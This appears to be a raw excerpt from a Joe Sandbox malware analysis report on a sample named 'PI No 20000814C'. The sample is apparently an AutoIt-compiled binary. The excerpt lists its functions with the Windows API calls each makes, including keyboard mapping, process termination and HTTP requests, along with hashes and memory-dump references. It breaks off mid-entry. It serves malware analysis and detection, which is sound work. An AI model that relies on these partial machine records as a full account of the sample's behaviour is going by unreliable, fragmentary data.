                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                    • String ID:
                                    • API String ID: 43455801-0
                                    • Opcode ID: 3a84b5319dfb808ecc0c2ffd57bc76cd93d25c69da616e24f5cbae9a2c2b8b58
                                    • Instruction ID: d973ac7477b69abb1b155fb3b162edd9a311fbc2fe94e9b04838caf9b8380a62
                                    • Opcode Fuzzy Hash: 3a84b5319dfb808ecc0c2ffd57bc76cd93d25c69da616e24f5cbae9a2c2b8b58
                                    • Instruction Fuzzy Hash: 55111B7640410CBFDF119F90DC88EEA7FADFF08364F048021BA188A1A1C7729D59EBA0
                                    Function 00F203A2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00F203D3
                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00F203DB
                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00F203E6
                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00F203F1
                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00F203F9
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F20401
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Virtual
                                    • String ID:
                                    • API String ID: 4278518827-0
                                    • Opcode ID: 1fb907c591ff4ef87cc0a84507b572204c1121baa70d9c33efad65224397a5ff
                                    • Instruction ID: b63b1ed99d3558e57c06ccf037da18100162a780460c0466a8eff19ff6934dc8
                                    • Opcode Fuzzy Hash: 1fb907c591ff4ef87cc0a84507b572204c1121baa70d9c33efad65224397a5ff
                                    • Instruction Fuzzy Hash: 19016CB09017597DE3008F5A8C85B52FFA8FF19354F00411BA15C87941C7F5A868CBE5
                                    Function 00F6568B Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00F6569B
                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00F656B1
                                    • GetWindowThreadProcessId.USER32(?,?), ref: 00F656C0
                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F656CF
                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F656D9
                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F656E0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                    • String ID:
                                    • API String ID: 839392675-0
                                    • Opcode ID: 3eef041034c1f6443c1c074a4ab2be5403d77b4c582c01407199509d754b8d7d
                                    • Instruction ID: 9efb889c484b263c96fc16c259a45d585149f4ab23f2a19f713bd887f73cce84
                                    • Opcode Fuzzy Hash: 3eef041034c1f6443c1c074a4ab2be5403d77b4c582c01407199509d754b8d7d
                                    • Instruction Fuzzy Hash: 5CF01D3264155CBFE7215BA2DC0DEFB7A7CEFCAB11F000269FA05D1050E6A11A15A7B5
                                    Function 00F674D2 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • InterlockedExchange.KERNEL32(?,?), ref: 00F674E5
                                    • RtlEnterCriticalSection.NTDLL(?), ref: 00F674F6
                                    • TerminateThread.KERNEL32(00000000,000001F6,?,00F11044,?,?), ref: 00F67503
                                    • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00F11044,?,?), ref: 00F67510
                                      • Part of subcall function 00F66ED7: CloseHandle.KERNEL32(00000000,?,00F6751D,?,00F11044,?,?), ref: 00F66EE1
                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00F67523
                                    • RtlLeaveCriticalSection.NTDLL(?), ref: 00F6752A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                    • String ID:
                                    • API String ID: 3495660284-0
                                    • Opcode ID: 1ef917fb8cf4f64d3aa794f87448298cba589d4c5ac0aa5764f4491a31c2f7c3
                                    • Instruction ID: 89ab7746eec3923224ce1f9b5fde64039781b5925eee1dfdd5f7bce70a302a51
                                    • Opcode Fuzzy Hash: 1ef917fb8cf4f64d3aa794f87448298cba589d4c5ac0aa5764f4491a31c2f7c3
                                    • Instruction Fuzzy Hash: 4CF05E3A540716EFDB112B64FC8C9FB772AEF45312B140572F203910B0DB795815EB50
                                    Function 00F78902 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                    Download Yara Rule
                                    APIs
                                    • VariantInit.OLEAUT32(?), ref: 00F78928
                                    • CharUpperBuffW.USER32(?,?), ref: 00F78A37
                                    • VariantClear.OLEAUT32(?), ref: 00F78BAF
                                      • Part of subcall function 00F67804: VariantInit.OLEAUT32(00000000), ref: 00F67844
                                      • Part of subcall function 00F67804: VariantCopy.OLEAUT32(00000000,?), ref: 00F6784D
                                      • Part of subcall function 00F67804: VariantClear.OLEAUT32(00000000), ref: 00F67859
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                    • API String ID: 4237274167-1221869570
                                    • Opcode ID: d41d8fc4789548f208366f376dd38497ab2029680152414dd1dfd731b52fe364
                                    • Instruction ID: 24ab2d4d106e53c8fbd73e060d1e021a2ac2c5fbb914b94bffb06be45e00dd75
                                    • Opcode Fuzzy Hash: d41d8fc4789548f208366f376dd38497ab2029680152414dd1dfd731b52fe364
                                    • Instruction Fuzzy Hash: 789162716083019FC710DF28C88495ABBF4EFC9754F14896EF89A8B362DB35D906EB52
                                    Function 00F62F86 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F1FEC6: _wcscpy.LIBCMT ref: 00F1FEE9
                                    • _memset.LIBCMT ref: 00F63077
                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F630A6
                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F63159
                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00F63187
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                                    • String ID: 0
                                    • API String ID: 4152858687-4108050209
                                    • Opcode ID: 4f238705f7bd016ea399a86ec809d367b83224e5d2604f2e955aace2604881f1
                                    • Instruction ID: 402849564ea6816b1b081f713df55523579260ea3823a7faf23b0ab954666d8d
                                    • Opcode Fuzzy Hash: 4f238705f7bd016ea399a86ec809d367b83224e5d2604f2e955aace2604881f1
                                    • Instruction Fuzzy Hash: F751C031E08301AED7259F28DD45A6BBBE8EF56324F04092DF895D31D1DB74CA48B792
                                    Function 00F62C42 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 00F62CAF
                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00F62CCB
                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 00F62D11
                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00FC6890,00000000), ref: 00F62D5A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Menu$Delete$InfoItem_memset
                                    • String ID: 0
                                    • API String ID: 1173514356-4108050209
                                    • Opcode ID: a13f42837034f9dcd6c4da03890a51328b9e95604660eac984bfbd9a20a5740e
                                    • Instruction ID: 7ed42778ce960bc0a8bb7678429b59201292fceb6bb2087f19321bfafc045168
                                    • Opcode Fuzzy Hash: a13f42837034f9dcd6c4da03890a51328b9e95604660eac984bfbd9a20a5740e
                                    • Instruction Fuzzy Hash: 6041EF306047029FD760DF24CC80B6ABBE8EF85320F14462EF865972E1D774E904DBA2
                                    Function 00F7DAB9 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                    Download Yara Rule
                                    APIs
                                    • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00F7DAD9
                                      • Part of subcall function 00F079AB: _memmove.LIBCMT ref: 00F079F9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: BuffCharLower_memmove
                                    • String ID: cdecl$none$stdcall$winapi
                                    • API String ID: 3425801089-567219261
                                    • Opcode ID: fc439269c70506c5bffa65efbbe5f282b0b41188a12fb701e5c4af1cb3ea8b04
                                    • Instruction ID: 7640778bca2cdba5954ab4e046531d8729eff3f7192a78619fdc13cfc79407c0
                                    • Opcode Fuzzy Hash: fc439269c70506c5bffa65efbbe5f282b0b41188a12fb701e5c4af1cb3ea8b04
                                    • Instruction Fuzzy Hash: A131CB7190421A9FCF00EF54CC819FEB3B4FF45720B50865AE865976D2DB75A905EF80
                                    Function 00F59372 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F07F41: _memmove.LIBCMT ref: 00F07F82
                                      • Part of subcall function 00F5B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00F5B0E7
                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00F593F6
                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00F59409
                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 00F59439
                                      • Part of subcall function 00F07D2C: _memmove.LIBCMT ref: 00F07D66
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: MessageSend$_memmove$ClassName
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 365058703-1403004172
                                    • Opcode ID: a97bf65dc2bb82c5b103eaedb09e810bbf075b39e15781855fea484b650796ce
                                    • Instruction ID: f8794a3e7e742ce82ca63e5f7338727525a506009009d38bcaf24813528c5af8
                                    • Opcode Fuzzy Hash: a97bf65dc2bb82c5b103eaedb09e810bbf075b39e15781855fea484b650796ce
                                    • Instruction Fuzzy Hash: E8210471E04108AEDB18AB70DC858FFB76CDF05320B108119FA21971E1DB785D0EBA20
                                    Function 00F71B21 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F71B40
                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F71B66
                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00F71B96
                                    • InternetCloseHandle.WININET(00000000), ref: 00F71BDD
                                      • Part of subcall function 00F72777: GetLastError.KERNEL32(?,?,00F71B0B,00000000,00000000,00000001), ref: 00F7278C
                                      • Part of subcall function 00F72777: SetEvent.KERNEL32(?,?,00F71B0B,00000000,00000000,00000001), ref: 00F727A1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                    • String ID:
                                    • API String ID: 3113390036-3916222277
                                    • Opcode ID: 6009f4077baeae80538ca21e28d1d48cbf5bd64dc176a35225bd9f0a92bf8cec
                                    • Instruction ID: da4ed5740287845460f0997d996f6baf7e55cdfbc1d91728b07b1ae7af74f30a
                                    • Opcode Fuzzy Hash: 6009f4077baeae80538ca21e28d1d48cbf5bd64dc176a35225bd9f0a92bf8cec
                                    • Instruction Fuzzy Hash: C82162B160020CBFEB159F689C85EBF76ECFB89754F10812BF549A6240EB249D096762
                                    Function 00F86656 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F01D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00F01D73
                                      • Part of subcall function 00F01D35: GetStockObject.GDI32(00000011), ref: 00F01D87
                                      • Part of subcall function 00F01D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F01D91
                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00F866D0
                                    • LoadLibraryW.KERNEL32(?), ref: 00F866D7
                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00F866EC
                                    • DestroyWindow.USER32(?), ref: 00F866F4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                    • String ID: SysAnimate32
                                    • API String ID: 4146253029-1011021900
                                    • Opcode ID: 5d36a9c1ac05a56732213af3a90bdd396a8352835d2a6703072fe9c4b712aed8
                                    • Instruction ID: 42ca8ec847026a7d1641559ec23de13dc8d158c50b1630b890d0a33616876ba4
                                    • Opcode Fuzzy Hash: 5d36a9c1ac05a56732213af3a90bdd396a8352835d2a6703072fe9c4b712aed8
                                    • Instruction Fuzzy Hash: 9F21797160024AAFEF106F64EC80EFB77A9EB59378F104629F910DA190EB71CC51BB61
                                    Function 00F6703E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetStdHandle.KERNEL32(0000000C), ref: 00F6705E
                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F67091
                                    • GetStdHandle.KERNEL32(0000000C), ref: 00F670A3
                                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00F670DD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: CreateHandle$FilePipe
                                    • String ID: nul
                                    • API String ID: 4209266947-2873401336
                                    • Opcode ID: 7908476dbebb30efdebe7e330f33da5a39fdb45e574be93cd517b0c95ef99920
                                    • Instruction ID: 23f3481ce0c97426590d248528a57188026784bf5d36ac24b427acb6930e1680
                                    • Opcode Fuzzy Hash: 7908476dbebb30efdebe7e330f33da5a39fdb45e574be93cd517b0c95ef99920
                                    • Instruction Fuzzy Hash: 00215E75904309BBDB20AF29DC05AAA77B8AF55728F204A19FCA1D72D0E7719850AB60
                                    Function 00F6710C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetStdHandle.KERNEL32(000000F6), ref: 00F6712B
                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F6715D
                                    • GetStdHandle.KERNEL32(000000F6), ref: 00F6716E
                                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00F671A8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: CreateHandle$FilePipe
                                    • String ID: nul
                                    • API String ID: 4209266947-2873401336
                                    • Opcode ID: a46e67e9d6d567772468d55d89109e541a7ef383db1a3191e5ce927b7979e568
                                    • Instruction ID: a3414d7c16137abcd3b92f157ec543856cbae9c539e294db97b4a6c6ea5ccc9c
                                    • Opcode Fuzzy Hash: a46e67e9d6d567772468d55d89109e541a7ef383db1a3191e5ce927b7979e568
                                    • Instruction Fuzzy Hash: 8F218375904309ABDB20AF699C04AAAB7E8AF56738F20071AFDB1D72D0D7709841EB51
                                    Function 00F6AEAB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetErrorMode.KERNEL32(00000001), ref: 00F6AEBF
                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00F6AF13
                                    • __swprintf.LIBCMT ref: 00F6AF2C
                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,00F8F910), ref: 00F6AF6A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ErrorMode$InformationVolume__swprintf
                                    • String ID: %lu
                                    • API String ID: 3164766367-685833217
                                    • Opcode ID: 49467d0472a62102df20b405b0a8fd34f129aa45b5e728085c81a5411b1dbaa2
